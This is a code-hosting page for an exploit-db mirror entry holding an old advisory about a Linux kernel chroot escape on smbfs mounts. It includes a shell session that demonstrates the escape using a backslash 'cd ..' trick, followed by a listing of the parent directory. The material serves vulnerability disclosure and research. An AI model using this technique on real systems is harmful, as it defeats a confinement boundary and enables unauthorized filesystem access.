bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/27766.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

18 lines
No EOL
702 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/17735/info
The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data.
The problem affects chroot inside of an SMB-mounted filesystem ('smbfs'). A local attacker who is bounded by the chroot can exploit this issue to bypass the chroot restriction and gain unauthorized access to the filesystem.
root@server me]# pwd
/path/to/my/dir
[root@server me]# ls
bin chroot etc lib
[root@server me]# chroot .
bash-2.05a# pwd
/
bash-2.05a# ls
bin chroot etc lib
bash-2.05a# cd ..\bash-2.05a# pwd
/..bash-2.05a# ls
<list of files from parent>
Reference in a new issue View git blame Copy permalink